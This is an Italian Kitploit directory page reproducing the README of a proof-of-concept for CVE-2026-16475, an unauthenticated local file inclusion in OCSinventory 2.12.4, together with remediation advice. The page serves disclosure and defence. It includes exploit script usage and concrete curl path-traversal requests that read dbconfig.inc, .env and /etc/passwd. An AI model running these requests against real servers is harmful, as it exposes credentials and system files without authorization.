Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
CVE-2026-16475-PoC — Questo è il repository ufficiale con il PoC della CVE-2026-16475, una LFI in OCSinventory 2.12.4. | Kitploit
Strumenti/GitHubGitHub/afertar/cve-2026-16475-poc
Analisi delle VulnerabilitàExploitSfruttamento di Applicazioni WebRaccolta InformazioniPenetration Testing
GitHubafertar/cve-2026-16475-poc

CVE-2026-16475-PoC

Questo è il repository ufficiale con il PoC della CVE-2026-16475, una LFI in OCSinventory 2.12.4.

Vedi Repository
21 mese faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

CVE-2026-16475 - PoC LFI OCSinventory

Vulnerabilità di Local File Inclusion in OCSinventory 2.12.4

Dettagli della vulnerabilità

CVE ID: CVE-2026-16475
Punteggio CVSS: 6.9 (Medio)
CWE: CWE-98 (Controllo improprio del nome file per l'istruzione Include/Require in un programma PHP)
Versione interessata: OCSinventory 2.12.4
Stato: Corretto nelle versioni più recenti

Descrizione

Una vulnerabilità di Local File Inclusion (LFI) esiste nell'endpoint /ajax/teledeployoptions.php a causa di una sanitizzazione impropria del parametro linkedoptions prima del suo utilizzo in un'operazione dinamica di inclusione di file XML.

L'endpoint è progettato per caricare file di configurazione XML ma non riesce a validare correttamente il parametro linkedoptions, consentendo attacchi di path traversal.

Un attaccante remoto non autenticato può sfruttare questa vulnerabilità per:

  • Includere e accedere a file XML arbitrari all'interno della directory dell'applicazione
  • Leggere file non-XML tramite i messaggi di errore del parser XML
  • Divulgare informazioni sensibili sulle risorse interne dell'applicazione
  • Enumerare i file di sistema ed eseguire il fingerprinting del sistema operativo
  • Impatto

    • Riservatezza: ALTA - Accesso a file arbitrari (file di configurazione, codice sorgente, log, file di sistema)
    • Integrità: NESSUNA
    • Disponibilità: NESSUNA
    • Autenticazione richiesta: NO
    • Interazione utente: NO

    Utilizzo

    Prerequisiti

    root@kitploit:~
    pip install -r requirements.txt
    

    Versione Python (Consigliata)

    root@kitploit:~
    python3 exploit.py -u http://target.com -v
    

    Opzioni:

    • -u, --url - URL del target (obbligatorio)
    • -v, --verbose - Output verboso
    • -o, --output - Salva le letture riuscite su file

    Esempio:

    root@kitploit:~
    python3 exploit.py -u http://ocs.example.com -v -o results.txt
    

    Versione Bash

    root@kitploit:~
    ./lfi_test.sh
    

    Modifica la variabile BASE_URL nello script:

    root@kitploit:~
    BASE_URL="http://target.com/ajax/teledeployoptions.php"
    

    Target enumerati

    • File di configurazione dell'applicazione (dbconfig.inc, .env, config.inc)
    • File di lavoro XML (bashscriptopt, executableopt, msiapplicationopt)
    • Log di sistema (apache2, mysql, auth)
    • File di sistema (/proc/, /etc/)
    • Segreti dell'applicazione (composer, file di pacchetto, .htaccess)

    Esempio di sfruttamento

    root@kitploit:~
    # Read database config
    curl "http://target/ajax/teledeployoptions.php?os=test&linkedoptions=../../../dbconfig.inc"
    
    # Read passwd file
    curl "http://target/ajax/teledeployoptions.php?os=test&linkedoptions=../../../../../../../../etc/passwd"
    
    # Read environment file
    curl "http://target/ajax/teledeployoptions.php?os=test&linkedoptions=../../../.env"
    

    Rimedio

    Per gli utenti:

    • Aggiorna OCSinventory all'ultima versione immediatamente
    • Implementa regole WAF per bloccare i pattern di directory traversal

    Per gli sviluppatori:

    • Utilizza basename() o funzioni simili per prevenire il path traversal
    • Valida e sanitizza tutti gli input utente prima delle operazioni sui file
    • Implementa controlli di accesso adeguati
    • Utilizza allow-list per i percorsi file validi

    Riferimenti

    • Avviso INCIBE (ES) - Autorità ufficiale di coordinamento CVE
    • OCS Inventory GitHub
    • OWASP Path Traversal
    • Definizione CWE-98

    Nota: CVE-2026-16475 è coordinato tramite INCIBE e potrebbe non essere ancora indicizzato in NVD. Consulta la fonte INCIBE per informazioni autorevoli.

    Note legali

    Solo per scopi educativi e test autorizzati

    Vedi DISCLAIMER.md per l'informativa legale completa.

    Autore

    Adrián Ferrer Tarí


    Divulgazione responsabile coordinata tramite INCIBE

    Scarica lo strumento